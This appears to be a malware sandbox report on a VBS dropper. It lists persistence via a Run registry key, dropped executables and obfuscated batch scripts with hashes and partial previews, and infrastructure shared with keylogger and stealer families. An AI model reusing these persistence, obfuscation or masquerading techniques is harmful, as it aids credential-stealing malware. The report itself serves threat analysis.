                                                                Sample name:INQUIRY LIST 292.vbs
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winVBS@28/11@3/3
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 85%
                                                                • Number of executed functions: 160
                                                                • Number of non-executed functions: 93
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .vbs

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                02:29:12API Interceptor2x Sleep call for process: x.exe modified
                                                                02:29:29API Interceptor2x Sleep call for process: Uhzauuil.PIF modified
                                                                07:29:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Uhzauuil C:\Users\Public\Uhzauuil.url
                                                                07:29:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Uhzauuil C:\Users\Public\Uhzauuil.url

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                193.122.6.168JHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                • checkip.dyndns.org/
                                                                MV Nicos Tomasos Vessel Parts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • checkip.dyndns.org/
                                                                Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • checkip.dyndns.org/
                                                                Contrarre.exeGet hashmaliciousMassLogger RATBrowse
                                                                • checkip.dyndns.org/
                                                                Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • checkip.dyndns.org/
                                                                rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • checkip.dyndns.org/
                                                                mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                • checkip.dyndns.org/
                                                                gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                • checkip.dyndns.org/
                                                                ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • checkip.dyndns.org/
                                                                ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                • checkip.dyndns.org/
                                                                104.21.96.1k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                                • www.uzshou.world/kbd2/?EtJTX=_JVX4ryxDRQpLJF&cNPH=ufZ7RYF4yLxNXVSq5Vx/4TYieRbcnKjskkbM3L5RbgB1pAgqHA7sfCNkYWLyXRMMwBB3JLbYKUw1FAOWml6VLpxPVZ4qXf58MsNUIQgw/PJ5HUGIvLQvrl5frN9PrRFpPiAd2cDcH6Sr
                                                                gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                                • www.dejikenkyu.cyou/58m5/
                                                                EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                                • www.mffnow.info/0pqe/
                                                                zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                                • www.aonline.top/fqlg/
                                                                QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                • www.mzkd6gp5.top/3u0p/
                                                                SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                • pelisplus.so/administrator/index.php
                                                                Recibos.exeGet hashmaliciousFormBookBrowse
                                                                • www.mffnow.info/1a34/

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                reallyfreegeoip.orgPI ITS15235 (2).docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 104.21.80.1
                                                                rDEKONT-1_16_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 104.21.64.1
                                                                JHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 104.21.48.1
                                                                MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 104.21.48.1
                                                                New PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                • 104.21.32.1
                                                                WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 104.21.64.1
                                                                order6566546663.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 104.21.48.1
                                                                Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 104.21.32.1
                                                                BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                                • 104.21.16.1
                                                                NEWORDER.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 104.21.96.1
                                                                checkip.dyndns.comPI ITS15235 (2).docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 132.226.247.73
                                                                rDEKONT-1_16_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 132.226.247.73
                                                                JHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 193.122.6.168
                                                                MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 193.122.130.0
                                                                New PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                • 158.101.44.242
                                                                WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 132.226.8.169
                                                                MV Nicos Tomasos Vessel Parts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 193.122.6.168
                                                                order6566546663.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 132.226.247.73
                                                                Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 193.122.6.168
                                                                BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                                • 132.226.247.73

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                ORACLE-BMC-31898USJHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 193.122.6.168
                                                                MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 193.122.130.0
                                                                New PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                • 158.101.44.242
                                                                MV Nicos Tomasos Vessel Parts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 193.122.6.168
                                                                Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 193.122.6.168
                                                                Execute.ps1Get hashmaliciousMetasploitBrowse
                                                                • 158.101.196.44
                                                                Invoice No 1122207 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 158.101.44.242
                                                                PDF6UU0CVUO2W-YGVUIO.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                • 193.122.130.0
                                                                PO#_1100015533.scrGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                • 193.122.130.0
                                                                1nl3hc.ps1Get hashmaliciousMassLogger RATBrowse
                                                                • 193.122.130.0
                                                                CLOUDFLARENETUSPI ITS15235 (2).docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 104.21.80.1
                                                                QT202515010642.JPG.PDF.vbsGet hashmaliciousUnknownBrowse
                                                                • 104.17.151.117
                                                                Personliche Nachricht fur Friedhelm Hanusch.pdfGet hashmaliciousUnknownBrowse
                                                                • 104.18.94.41
                                                                arm7.elfGet hashmaliciousUnknownBrowse
                                                                • 1.12.192.222
                                                                https://solve.xfzz.org/awjsx.captcha?u=20d5b468-46a4-4894-abf8-dabd03b71a69Get hashmaliciousUnknownBrowse
                                                                • 172.67.215.98
                                                                https://crm1.ascentismedia.com/MatrixCRM2/CommunicationsCentre/publicpages/LinkTrackers.aspx?link=https%3A%2F%2Fdenionquil.glitch.me%23Y3VzdG9tZXJzZXJ2aWNlQGRpYXRyb24uY29t&blastid=HaJwKgulsuhThrevQ-bg1A==&cc=k7ybaJOHC1q7mw3Z9UVdFw==&linkid=n6XO784zESaOPkbEOEOx87g4IWcBarkC2D1Tdl8CJciDFYwgGprfRd-XvUJO4gpJ&MID=gbzhqmttgi2dknbxgyza&CNO=&isCXComm=1Get hashmaliciousUnknownBrowse
                                                                • 104.21.63.154
                                                                https://vyralink.emlnk.com/lt.php?x=3DZy~GE7IaWZ5XV7zAA9W.Zs~X7UvAL0v~hgXXLLJ3ag6X8v-Uy.xuG-142imNf#user_email=fiona.zhang@bbraun.com&fname=Zhang&lname=FionaGet hashmaliciousUnknownBrowse
                                                                • 104.17.25.14
                                                                rDEKONT-1_16_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 104.21.64.1
                                                                JHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 104.21.48.1
                                                                https://guf1.xemirax.ru/Get hashmaliciousUnknownBrowse
                                                                • 104.21.85.129

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                54328bd36c14bd82ddaa0c04b25ed9adPI ITS15235 (2).docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 104.21.96.1
                                                                rDEKONT-1_16_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 104.21.96.1
                                                                JHGFDFG.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 104.21.96.1
                                                                MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 104.21.96.1
                                                                New PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                • 104.21.96.1
                                                                WOOYANG VENUS_VESSEL_PARTICULARS.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 104.21.96.1
                                                                order6566546663.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 104.21.96.1
                                                                Order Details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 104.21.96.1
                                                                BNXCXCJSD.jseGet hashmaliciousMassLogger RATBrowse
                                                                • 104.21.96.1
                                                                NEWORDER.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 104.21.96.1
                                                                a0e9f5d64349fb13191bc781f81f42e1PI ITS15235 (2).docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 50.116.86.44
                                                                g6lWBM64S4.msiGet hashmaliciousUnknownBrowse
                                                                • 50.116.86.44
                                                                new-riii-1-b.pub.htaGet hashmaliciousLummaCBrowse
                                                                • 50.116.86.44
                                                                EZsrFTi.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                • 50.116.86.44
                                                                lummm_lzmb.exeGet hashmaliciousLummaCBrowse
                                                                • 50.116.86.44
                                                                L#U043e#U0430d#U0435r.exeGet hashmaliciousLummaCBrowse
                                                                • 50.116.86.44
                                                                Xeno.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                • 50.116.86.44
                                                                Adobe-Acrobat-Pro-2025.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                • 50.116.86.44
                                                                MotivatedFunded.exeGet hashmaliciousLummaC StealerBrowse
                                                                • 50.116.86.44

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Users\Public\Libraries\liuuazhU.pifPI ITS15235 (2).docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                    PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                      ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                          ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                HSBC_PAY.SCR.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                  PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Users\Public\Libraries\FX.cmd

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8214
                                                                                    Entropy (8bit):4.674238519900089
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:xmRmcVw5I1Rsv869gx2A9gB59zox8Y2MXNlT3l:xmcIDsss3ffY2MXDJ
                                                                                    MD5:7821E3DE3812E791CF3B223500D73BC9
                                                                                    SHA1:5E211B634CE77E6FEE83CE8A5B8C9A37C8B81E1D
                                                                                    SHA-256:3DAA7F9EEE129F61F7A452F7150EE21A1C4141586A37F37842B9C3BB53152A74
                                                                                    SHA-512:6EAE270065401626DF97B73A255578BF27B4F4DEA480954843823046AD95E40CF706C1A767C8765EF3AB48EA3A18498375614317EC00A9EF29A4DD21EDBC5F26
                                                                                    Malicious:false
                                                                                    Preview:@echo off..set "kocp=sket "..@% . .......%e%..... ..%c% .%h%......%o%..r.o% %......%o%....o.... %f%r%f%.. .%..s%.%e%..%t%. ..% %.%"%..%X%.. %I%.......%n%.....%i%....... %=%.......%s%...%e%. .o.%t%.....% %.r..r....%"%.%..%XIni%"%... %s% ......%K%o.%x%..%H%......%=%.........o%=%. ...%"%...o..%..%XIni%"%..........%F%.r.. ... %J%.%I%.o%V%......%I%.%x%. %F%........%p%..........%s%....... .%T%r..%%sKxH%h%.o....o..%2%....r....r%s%.....%h%...o..%"% ... %..%XIni%"%. .%B%.........%m%.....%T%...o.%j%........%M%.%S%......

                                                                                    C:\Users\Public\Libraries\NEO.cmd

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (372), with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):28538
                                                                                    Entropy (8bit):4.650636495384082
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:Y0iUTHG+EnI6DRfX67uezyCqIUEfDTfF3K0QNqTTwNv7lkqj3DRvCpoVsodnqgJW:YwWbDRfipu7IUkfYQ0Xkqjgww
                                                                                    MD5:E24FA8FB365A89779B026772B9342AF3
                                                                                    SHA1:B90DE3C9F3093CA8BADFAF6C98218B744087E8F9
                                                                                    SHA-256:10D7B4EA056FC1037109FE6E6694849D145B0745FAA9AE02957104A2834A14A0
                                                                                    SHA-512:A32F7A29C4C8CC831A5057B8DB31F79E7DEDB9172AC9705DA6A8DA65384ED23827C3CCCDB833562CDAB63ADDD679341707A2B46BBC8C802845CBBBBB01771D10
                                                                                    Malicious:false
                                                                                    Preview:@echo off..@%.. ..%e%r.%c%...r.%h%..%o%r........% %....%o%. ..%f%..........%f%....%..s%. ......%e%.... ...%t%.% %.. o..o.%"%r.r.......%x%.......%u%..o..... %u%.%y%.......%=%o..r..%s%..%e% o%t%r.......% %..o%"%..r.....%..%xuuy%"%.........%J%...%o%..r ....%Z%...%u%.......%=%.%=%..%"%..........%..%xuuy%"%....%s%.......%F%..r..o..o%o%.......%F%.... .....%G%..%l%.r... ....%F%.%k%.%a%. ...%g%ro.. %%JoZu%h%.%2% ...r.%s%..........%h% %"%... .....%..%xuuy%"%......%H%..%O%.....r..%D%.. .%B%..... ...%e%.....

                                                                                    C:\Users\Public\Libraries\Uhzauuil

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):573566
                                                                                    Entropy (8bit):7.980117621307447
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:NIAbBGI0yoMha6YfLzqT2FqJv/bgjnNdqCq+eJOvMy9U/Et:xb7ZoLzqEqvTgjnNdqCq+10yG/Et
                                                                                    MD5:25DB6EECAE3F2A0E24C3C8ECBFEF5D73
                                                                                    SHA1:FF5E6B0317545B11F1AB51D225C5D8DCE9890C23
                                                                                    SHA-256:D9D561DF91D8D2A0B72A8CD5DF34561F127A0B4567372664D656DD3EA87E6FD9
                                                                                    SHA-512:074D6B37C377FD1EAE96D0C2835B638B6CFAAF8F86C2016560090F328CBAC13CE9DE32B9CE86DC0FF1D6C0A0730652A66956071B4B7C9E86F96AE80AF13A320C
                                                                                    Malicious:true
                                                                                    Preview:.2i..,t...*..qE....Dr..B..-n..J...M..\...T...\..L...J..e..`..j...Q.J....x...c.Nv.n..V.Po..p...|3.;.%.{....G.*....@i.+*j.^..a6.e...?`..\.R..|..T0?..4...a..V7Gy...=...1..f....ml.6b...p...a.P....q....../....nO.F..gnc..l?d-&&}..s...A..?{......M.....(..\.l..B..Z..Jv..Y.<...?....0..:.....L..FT.V..{.SG$$..7.{....E.F.g.jq.$&o1cDi..l..d.:.c.......N...:.v....../.....~3.B.\a.](4..:j.."..VL...m..e.$&..[.T..Bj.5J.L.i.F..`:.aw.E.4....B..._.>..e.6...rN....%...%..D.A.......W$&.1.d.h...F.27...}.9... aH.....<.....n.C..J.v.x5...[>.$&...x:.JB..0s.....Z'.=...(.&$.L.:......)$$]....!.e.).M.p..p.d....m.:.;.Op...&$hL.70...l.....G]E..CTL.a..xH..a.K..*{.a.'..O....F...5]v&&.....^aB8......`..;.M..og....Vq..E..=U".K...c.]._..[..D.j?+,..b...f..V?=.8..y0..DKc.~`UV......3>Xp...../.Z......).^.T}....g.;.#.%.......-.&&D..p..n...@..Uvj.z-.64$&.E{...E..0..bz..S..a...k.mF..L.T...{).M/...y.U4..r....8..$&...m..)'`).%.k...g..P......hU."..$$...*p8....$$..&$..\=$&.c.....:L%..G..

                                                                                    C:\Users\Public\Libraries\Uhzauuil.PIF

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):854016
                                                                                    Entropy (8bit):6.911818112914193
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:aAm99652dKVsiJ9Pu8BHTN3KxxcycdnawpVdAorkBK1zmQ7HDEKDmC/E:7oqcKmiJ88ZZsTzOlIWznHY
                                                                                    MD5:4692AEE744A1B1FAB794FF334A77A462
                                                                                    SHA1:E5F8E1B159208FF1898E08F5C6A81CD0F0953981
                                                                                    SHA-256:00140069B6C9F47F98C8E82B448D5F6ABDF33354B9BC6BECF4B61DF72F5ED184
                                                                                    SHA-512:0755FF15408DD053187B88ADC965FF88E71B0B22555000C488E15A415499E9598B9A361F9EF49BE066452970CECFC6ECBA302CFC956FA9419DDEFE1E2978B5D4
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................h..........Tw............@..............................................@..............................t$...........................0...^........................... .......................................................text...._.......`.................. ..`.itext.......p.......d.............. ..`.data................l..............@....bss.....6...............................idata..t$.......&..................@....tls....4................................rdata....... ......................@..@.reloc...^...0...`..................@..B.rsrc...............................@..@....................................@..@................................................................................................

                                                                                    C:\Users\Public\Libraries\YKA

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):2.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Eyn:Ey
                                                                                    MD5:DC91AAD4ACB490E3A48C0FDC3B452AB0
                                                                                    SHA1:CE5A59131E32A7A6C1A0A02E878550EFAEB10DBC
                                                                                    SHA-256:08680581317723DB336F15D21AB3AEBD6AF9657FE7C9A91681A775FE035283B9
                                                                                    SHA-512:641993A30CEFDCDA7FA2BB7BE585D432CC053D889A4A7A47AF3D5C0D26156CE372078C19877C15310E7D286C5A6AA19A0D4DCD2866B1953A498FE69D489A5725
                                                                                    Malicious:false
                                                                                    Preview:54..

                                                                                    C:\Users\Public\Libraries\liuuazhU.pif

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):175800
                                                                                    Entropy (8bit):6.631791793070417
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                    MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                    SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                    SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                    SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: PI ITS15235 (2).doc, Detection: malicious, Browse
                                                                                    • Filename: PI ITS15235.doc, Detection: malicious, Browse
                                                                                    • Filename: PO#3_RKG367.bat, Detection: malicious, Browse
                                                                                    • Filename: ENQ-0092025.doc, Detection: malicious, Browse
                                                                                    • Filename: yxU3AgeVTi.exe, Detection: malicious, Browse
                                                                                    • Filename: ITT # KRPBV2663 .doc, Detection: malicious, Browse
                                                                                    • Filename: PI ITS15235.doc, Detection: malicious, Browse
                                                                                    • Filename: PO#5_Tower_049.bat, Detection: malicious, Browse
                                                                                    • Filename: HSBC_PAY.SCR.exe, Detection: malicious, Browse
                                                                                    • Filename: PO_B2W984.com, Detection: malicious, Browse
                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@

                                                                                    C:\Users\Public\Uhzauuil.url

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Uhzauuil.PIF">), ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):104
                                                                                    Entropy (8bit):5.056115382653646
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMujJajSsbxjl0vn:HRYFVmTWDyzXjhExpWn
                                                                                    MD5:0D0F90D0A2305ACF72A1DFB57729A1CB
                                                                                    SHA1:E472CF44CDC1A662B5FF20072612C241F8D36453
                                                                                    SHA-256:989E6E47757F8F805E76B9ED25D7FA86276811FCC5A39704731FA0B2C6FF2DB8
                                                                                    SHA-512:AD28EB4F86B02DF6171CB8C4F1EEB5BAE87A4979EAC08781835C766C21A044BF8877B8D48733338A7F5A901CA93F833E5CD943A9FBEF534D146C9C17CDC7E0E6
                                                                                    Malicious:true
                                                                                    Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Uhzauuil.PIF"..IconIndex=975970..HotKey=77..

                                                                                    C:\Users\Public\UhzauuilF.cmd

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):11278
                                                                                    Entropy (8bit):4.653311201735178
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:aMDConKxnlt4iVNt4BIvf6hJyMCdvWr3YGjZq3W4ERrr83hGgPKnrJTFlmwu26:BDWxl+mymfbMAM83WMgguTFlj96
                                                                                    MD5:F82AEB3B12F33250E404DF6EC873DD1D
                                                                                    SHA1:BCF538F64457E8D19DA89229479CAFA9C4CCE12F
                                                                                    SHA-256:23B7417B47C7EFB96FB7CE395E325DC831AB2EE03EADDA59058D31BDBE9C1EA6
                                                                                    SHA-512:6F9D6DAEED78F45F0F83310B95F47CC0A96D1DB1D7F6C2E2485D7A8ECB04FEE9865EEC3599FEE2D67F3332F68A70059F1A6A40050B93EF44D55632C24D108977
                                                                                    Malicious:false
                                                                                    Preview:@echo off..@%..%e%....%c% .%h%.. ......%o%.o.....o..% %.........%o%....r....%f%.o........%f%.....%..s%..... ...%e% r.r.. ...%t%..........% %.... %"%.......%I%..........%F%..%X%o....r..%Q%...o.%=%. ...%s%o..%e%... %t%. o. .% %..%"%..%..%IFXQ%"%..%w%..%S%..... .%c%.....%t%..r.......%=%.%=%....%"%.....%..%IFXQ%"%or.....%d%.........%s%...%b%o.r%m% .....r...%U% .. ..o...%U%.o%u%.... .%r%.........%v%...r..%s%...... ...%%wSct%C%.......%l%..r.%o%....%a%..r....r%"%.....o....%..%IFXQ%"%... .o...%y% %h%r.%R%....

                                                                                    C:\Users\user\AppData\Local\Temp\x.exe

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):854016
                                                                                    Entropy (8bit):6.911818112914193
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:aAm99652dKVsiJ9Pu8BHTN3KxxcycdnawpVdAorkBK1zmQ7HDEKDmC/E:7oqcKmiJ88ZZsTzOlIWznHY
                                                                                    MD5:4692AEE744A1B1FAB794FF334A77A462
                                                                                    SHA1:E5F8E1B159208FF1898E08F5C6A81CD0F0953981
                                                                                    SHA-256:00140069B6C9F47F98C8E82B448D5F6ABDF33354B9BC6BECF4B61DF72F5ED184
                                                                                    SHA-512:0755FF15408DD053187B88ADC965FF88E71B0B22555000C488E15A415499E9598B9A361F9EF49BE066452970CECFC6ECBA302CFC956FA9419DDEFE1E2978B5D4
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................h..........Tw............@..............................................@..............................t$...........................0...^........................... .......................................................text...._.......`.................. ..`.itext.......p.......d.............. ..`.data................l..............@....bss.....6...............................idata..t$.......&..................@....tls....4................................rdata....... ......................@..@.reloc...^...0...`..................@..B.rsrc...............................@..@....................................@..@................................................................................................

                                                                                    C:\Windows \SysWOW64\NETUTILS.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):119033
                                                                                    Entropy (8bit):5.148072354937474
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:BDzIi47phID3zvyDXthSmsVBc2w5jEjISsnEICl7MbiRwRkSYJQ:BDz47pq/6hShc2ljISsnEGRkSYJQ
                                                                                    MD5:A88976A70AED45F610A032E438A82A95
                                                                                    SHA1:EC20B0F0D6CCC848C8FFA857AB4E771672DFA4F2
                                                                                    SHA-256:F3D5A6EBCD8CAB3CC9A98488B23C2DE740C6EF04E33ED317A3E2A047D53D169B
                                                                                    SHA-512:EC77BB81B9E6DE4AF8A17EB26281D10FC9A05947D588F2EE3680ADA67ED28118FBC9A2D0E63BF0ECC2A4C318555A4F27E72ECF1A530A506E9B4FBF5EFDB4F676
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 61%
